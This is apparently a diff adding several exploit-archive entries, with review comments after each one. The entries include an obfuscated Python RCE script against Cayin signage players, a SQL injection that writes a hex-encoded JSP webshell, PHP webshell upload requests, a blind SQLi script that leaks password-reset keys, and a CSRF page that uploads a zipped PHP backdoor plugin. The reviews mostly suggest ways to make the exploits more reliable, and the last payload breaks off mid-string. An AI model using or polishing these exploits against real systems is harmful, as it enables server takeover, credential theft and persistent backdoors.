# $ ./cayin.py 192.168.1.2 id
|
||||
# uid=0(root) gid=65534(guest)
|
||||
# # start sshd
|
||||
# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd
|
||||
# $
|
||||
# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'"
|
||||
# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
|
||||
# tcp 0 0 :::22 :::* LISTEN
|
||||
# $ ./cayin.py 192.168.1.2 "cat /etc/passwd"
|
||||
# root:x:0:0:root:/root:/bin/bash
|
||||
# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
|
||||
# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
|
||||
# sshd:x:1000:0::/dev/null:/sbin/nologin
|
||||
# $
|
||||
# -----------------------------------------------------
|
||||
#
|
||||
# Tested on: CAYIN Technology KT-Linux v0.99
|
||||
# Apache/1.3.42 (Unix)
|
||||
# Apache/1.3.41 (Unix)
|
||||
# PHP/5.2.5
|
||||
# Linux 2.6.37
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5569
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
|
||||
#
|
||||
#
|
||||
# 15.05.2020
|
||||
#
|
||||
|
||||
import requests
|
||||
import sys#____
|
||||
import re#_____
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
print("Cayin SMP WebManager Post-Auth RCE")
|
||||
print("Usage: ./cayin.py [ip] [cmd]")
|
||||
sys.exit(17)
|
||||
else:
|
||||
ip____address = sys.argv[1]
|
||||
ex____command = sys.argv[2]
|
||||
|
||||
ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f"
|
||||
ur____identif += (bytes(ip____address, "utf-8"))
|
||||
ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
|
||||
ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
|
||||
ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
|
||||
ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
|
||||
ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
|
||||
ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
|
||||
ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
|
||||
ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
|
||||
ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
|
||||
ur____identif += b"\x67\x25\x32\x36" ##########"
|
||||
ur____identif += (bytes(ex____command, "utf-8"))
|
||||
ur____identif += b"\x25\x32\x36" ##############"
|
||||
|
||||
ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
|
||||
re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
|
||||
print(re____outputs)
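Review bot: the target URL is assembled from hex byte literals (`b"\x68\x74\x74\x70..."`), which only hides that it is the `wizard_system.cgi` `NTP_Server_IP` GET request the Desc already describes; write it as a plain string so a reader can check it against the description. The padded identifiers (`ip____address`, `import sys#____`) are a style problem in the same vein, and `# Author:LiquidWorm` is missing its space. Evidence of impact is good here: the sample session shows `uid=0(root)` and sshd being started. Note also that the request goes to `http://` with HTTP Basic credentials (`auth = ("webadmin", "admin")`), so the default credentials travel in clear over the network. For defenders, the fixes are a forced password change, validating `NTP_Server_IP` as a hostname or IP before any shell use, running the CGI under an unprivileged account, and serving the management UI only over TLS; a `wizard_system.cgi` or `system.cgi` request whose `NTP_Server_IP` contains `%26`/`&` or other shell metacharacters is the access-log signature.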
121
exploits/multiple/webapps/48558.txt
Normal file
@ -0,0 +1,121 @@
# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: https://www.cayintech.com
|
||||
# CVE: N/A
|
||||
|
||||
#!/usr/bin/env python3
|
||||
#
|
||||
#
|
||||
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
|
||||
#
|
||||
#
|
||||
# Vendor: CAYIN Technology Co., Ltd.
|
||||
# Product web page: https://www.cayintech.com
|
||||
# Affected version: 2.5.18103
|
||||
# 2.0
|
||||
# 1.0
|
||||
#
|
||||
# Summary: CAYIN xPost is the web-based application software, which offers a
|
||||
# combination of essential tools to create rich contents for digital signage in
|
||||
# different vertical markets. It provides an easy-to-use platform for instant
|
||||
# data entry and further extends the usage of CAYIN SMP players to meet users'
|
||||
# requirements of frequent, daily maintenance.
|
||||
#
|
||||
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
|
||||
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
|
||||
# is not properly sanitised before being returned to the user or used in SQL queries.
|
||||
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
|
||||
# and execute SYSTEM commands.
|
||||
#
|
||||
# --------------------------------------------------------------------------------
|
||||
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
|
||||
# # Injecting...
|
||||
# # Executing...
|
||||
#
|
||||
# Command: whoami
|
||||
#
|
||||
# nt authority\system
|
||||
#
|
||||
#
|
||||
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
|
||||
# lqwrm@zslab:~$
|
||||
# --------------------------------------------------------------------------------
|
||||
#
|
||||
# Tested on: Microsoft Windows 10 Home
|
||||
# Microsoft Windows 8.1
|
||||
# Microsoft Windows Server 2016
|
||||
# Microsoft Windows Server 2012
|
||||
# Microsoft Windows 7 Ultimate SP1
|
||||
# Apache Tomcat/9.0.1
|
||||
# MySQL/5.0
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5571
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
|
||||
#
|
||||
#
|
||||
# 15.05.2020
|
||||
#
|
||||
|
||||
import requests as req
|
||||
import time as vremeto
|
||||
import sys as sistemot
|
||||
import re as regularno
|
||||
|
||||
if len(sistemot.argv) < 2:
|
||||
print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
|
||||
print("Usage: ./wayfinder.py ip:port")
|
||||
sistemot.exit(19)
|
||||
else:
|
||||
ip = sistemot.argv[1]
|
||||
|
||||
filename = "thricer.jsp"
|
||||
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
|
||||
constr = "-251' UNION ALL SELECT "
|
||||
|
||||
print("# Injecting...")
|
||||
|
||||
cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
cmdjsp += "0a0a"

columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"
mysqli = constr + cmdjsp + columns + sqlwrite
r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
vremeto.sleep(1)

print("# Executing...")

r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
clean = clean.group(1).replace("<BR>", "\n")
print(clean)
print("You have a webshell @ http://" + ip + "/" + filename)
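Review bot: `clean.group(1)` will raise AttributeError whenever the `<pre>` block is absent from the response, which is exactly what happens when the DUMPFILE write fails (MySQL account without FILE privilege, `secure_file_priv` set, or a webapps directory other than the hardcoded `C:/CayinApps/webapps/`); test the `search()` result for `None` and print `r.status_code` and `r.text` before parsing so the failure mode is visible. The injection request is never checked before the one-second sleep and the shell fetch, and the fixed NULL padding in `columns` has to match the column count of the vulnerable SELECT, so a deployment with a different schema fails silently; a comment stating the expected column count and the target path as assumptions would help. Minor: the usage banner names `wayfinder.py` while the dropped file is `thricer.jsp`.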
20
exploits/php/webapps/48542.txt
Normal file
@ -0,0 +1,20 @@
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server

--Vulnerable file /full-profile.php

--Vulnerable code;
$ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");

Id parameter's value is going into sql query directly!

--Proof Of Concept

sqlmap -u "http://TARGET/hostel/full-profile.php?id=6"
OR
http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error
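Review bot: the single-quote check only proves the bug when MySQL errors are echoed to the page; with display_errors off the response is just empty, so the PoC should also give a probe that works blind, for example `id=6' AND SLEEP(5)-- -` or `id=6' AND '1'='1` versus `'1'='2`, and the sqlmap line should pin the parameter and backend (`-p id --dbms=mysql`). The "Unauthenticated" qualifier rests on full-profile.php performing no session check, which the write-up should state explicitly next to the vulnerable code rather than leave implied by the title.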
62
exploits/php/webapps/48544.txt
Normal file
@ -0,0 +1,62 @@
# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-06-02
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A

# Vulnerability:
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# vulnerable file : manage_website.php
# Details:
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php

# Proof of Concept:
http://localhost/source%20code/manage_website.php

POST /source%20code/manage_website.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------135192786613366
Content-Length: 2539
Referer: http://localhost/source%20code/manage_website.php
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------58631544014332: undefined
Content-Disposition: form-data; name="title"

-----------------------------58631544014332
Content-Disposition: form-data; name="short_title"


-----------------------------58631544014332
Content-Disposition: form-data; name="footer"


-----------------------------58631544014332
Content-Disposition: form-data; name="currency_code"


-----------------------------58631544014332
Content-Disposition: form-data; name="currency_symbol"


-----------------------------58631544014332
Content-Disposition: form-data; name="old_website_image"

logo for hospital system.jpg
-----------------------------58631544014332
Content-Disposition: form-data; name="website_image"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo shell_exec($_GET["cmd"]); ?>
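Review bot: the title says Unauthenticated, but the Details step starts with "login to website as patient", so this is an authenticated low-privilege user reaching an admin-only page that lacks an authorization check; the title and the "Unauthenticated File Upload" sentence should say Authenticated (patient) and name the missing admin check in manage_website.php as the root cause. The captured request is also not replayable as written: the Content-Type header declares boundary `---------------------------135192786613366` while every part uses `-----------------------------58631544014332`, the first part line carries a stray `: undefined` suffix, Content-Length 2539 does not match the body shown, and the closing `-----------------------------58631544014332--` is missing. Align the boundary, drop the suffix and terminate the body so the request can be replayed from Burp or curl. Apart from its title this file is byte-for-byte the same write-up as 48547.txt; one entry would do.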
34
exploits/php/webapps/48545.py
Executable file
@ -0,0 +1,34 @@
# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE: N/A

# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database.
# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash.
# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]`

import requests, time, string

user = raw_input("Please enter your username: \n")
password = raw_input("Please enter your password: \n")
URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n")

s = requests.Session()
data = {'login-username': (None, user), 'login-password':(None, password)}
s.post(url = URL + "login.php", files = data)
dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits
final = ""
while True:
    for x in dictionary:
        payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -'
        r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload)
        if int(r.elapsed.total_seconds()) > 4:
            final += x
            print "Leaking contents of admin hash: " + final
            break
        else:
            pass
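Review bot: the `while True` loop never terminates. Once the whole activation_key has been recovered no character in `dictionary` matches, the `for` loop completes without `break`, and the script re-sends the same 62 requests forever; set a flag inside the `for`, and `break` out of `while True` (printing `final`) when a full pass finds nothing. Other points: `URL + "/navigate.php"` yields a double slash with the `http://domain.com/navigate/` format the prompt asks for, unlike the `login.php` line above it; the progress message says "admin hash" but the leaked value is activation_key; the script is Python 2 only (`raw_input`, `print` statement) and the header should say so; and the request has no `timeout=`, so a slow target both false-positives against the 4-second threshold and can hang the loop, so pass a timeout and compare against a measured baseline rather than a constant. `REGEXP BINARY` makes the match case-sensitive, which is why both cases are in `dictionary`; worth a comment.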
76
exploits/php/webapps/48546.txt
Normal file
@ -0,0 +1,76 @@
# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection
# Google Dork: inurl:/eotools_share/
# Date: 2020-06-03
# Exploit Author: TSAR
# Vendor Homepage: http://www.oriolespinal.es/eowd
# Software Link: http://www.oriolespinal.es/eotools
# Version: ALL VERSION UP TO LATEST
# Tested on: MACOS 10.11.2
# CVE : NOt YET

[1]########### SQl INJECTION ###########

Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable

http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10--


[2]########### SQl INJECTION ###########




Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable:


POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556
Content-Length: 740
Connection: close
Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada

-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/png

PNG;
********************************/
********************************/
GIF89a;
********************/
********************/<?php $_GET[d]($_GET[dd]); ?>
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="categoria"

pdfs
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="descripcion"

123
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="submit"

upload
-----------------------------165073870416097602871919119556--


the shell path is:

http://victim.com/path/eotools_files/files/shell.php


==========================================================

==========================================================

Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r
[ALL MUSLIM AND ARAB HACKERS]

==========================================================
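Review bot: section [2] is headed "SQl INJECTION" but describes the arbitrary file upload, and the title only advertises the SQLi; retitle the section FILE UPLOAD and either rename the entry or split it into two. The upload is POSTed to `/path/eotools_cms/app_gestor_archivos/upload2_iframe.php` with a PHPSESSID cookie, so the write-up needs to say whether a logged-in session is required; the `userfile` part is accepted as `image/png` with PNG and GIF header strings, which points at a Content-Type or magic-byte check without an extension check, and that should be stated as the root cause. The dropped shell `<?php $_GET[d]($_GET[dd]); ?>` relies on bare-word array keys; that is a warning on PHP 7.2+ and a fatal Error on PHP 8, so quote the keys. "brone" should read "prone" in both sections, and "ALL VERSION UP TO LATEST" is not a testable range; give the version actually tested.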
62
exploits/php/webapps/48547.txt
Normal file
@ -0,0 +1,62 @@
# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-06-02
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A

# Vulnerability:
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# vulnerable file : manage_website.php
# Details:
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php

# Proof of Concept:
http://localhost/source%20code/manage_website.php

POST /source%20code/manage_website.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------135192786613366
Content-Length: 2539
Referer: http://localhost/source%20code/manage_website.php
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------58631544014332: undefined
Content-Disposition: form-data; name="title"

-----------------------------58631544014332
Content-Disposition: form-data; name="short_title"


-----------------------------58631544014332
Content-Disposition: form-data; name="footer"


-----------------------------58631544014332
Content-Disposition: form-data; name="currency_code"


-----------------------------58631544014332
Content-Disposition: form-data; name="currency_symbol"


-----------------------------58631544014332
Content-Disposition: form-data; name="old_website_image"

logo for hospital system.jpg
-----------------------------58631544014332
Content-Disposition: form-data; name="website_image"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo shell_exec($_GET["cmd"]); ?>
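Review bot: apart from the title this file is identical to 48544.txt, including the "Vulnerability:" paragraph that still calls the bug an Unauthenticated File Upload, which contradicts this entry's Authenticated title and the patient-login step in Details; reword that paragraph here to say a patient-level account reaches manage_website.php because the page checks for a session but not for the admin role. The same replay defects carry over: the header boundary `135192786613366` does not match the body boundary `58631544014332`, the first part line has a stray `: undefined` suffix, Content-Length is wrong for the body shown, and the terminating `--` boundary is missing.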
99
exploits/php/webapps/48548.txt
Normal file
@ -0,0 +1,99 @@
# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE:

<!--
After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location):
http://DOMAIN.com/navigate/plugins/chiv/chiv.php
-->

<script>
var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload";

function byteValue(x) {
    return x.charCodeAt(0) & 0xff;
}

function toBytes(datastr) {
    var ords = Array.prototype.map.call(datastr, byteValue);
    var ui8a = new Uint8Array(ords);
    return ui8a.buffer;
}

if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
        this.send(toBytes(datastr));
    }
}

function fileUpload(fileData, fileName) {
    var fileSize = fileData.length,
        boundary = "---------------------------399386530342483226231822376790",
        uri = logUrl,
        xhr = new XMLHttpRequest();

    var additionalFields = {
    }

    var fileFieldName = "extension-upload";

    xhr.open("POST", uri, true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
    xhr.setRequestHeader("Content-Length", fileSize);
    xhr.withCredentials = "true";

    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {

                if (xhr.responseText != "") {
                    alert(JSON.parse(xhr.responseText).msg); // display response.
                }
            } else if (xhr.status == 0) {
                $("#goto").show();
            }
        }
    }

    var body = "";

    for (var i in additionalFields) {
        if (additionalFields.hasOwnProperty(i)) {
            body += addField(i, additionalFields[i], boundary);
        }
    }

    body += addFileField(fileFieldName, fileData, fileName, boundary);
    body += "--" + boundary + "--";
    xhr.sendAsBinary(body);
    return true;
}

function addField(name, value, boundary) {
    var c = "--" + boundary + "\r\n"
    c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
    c += value + "\r\n";
    return c;
}

function addFileField(name, value, filename, boundary) {
    var c = "--" + boundary + "\r\n"
    c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
    c += "Content-Type: application/zip\r\n\r\n";
    c += value + "\r\n";
    return c;
}

var start = function() {
var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5
b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\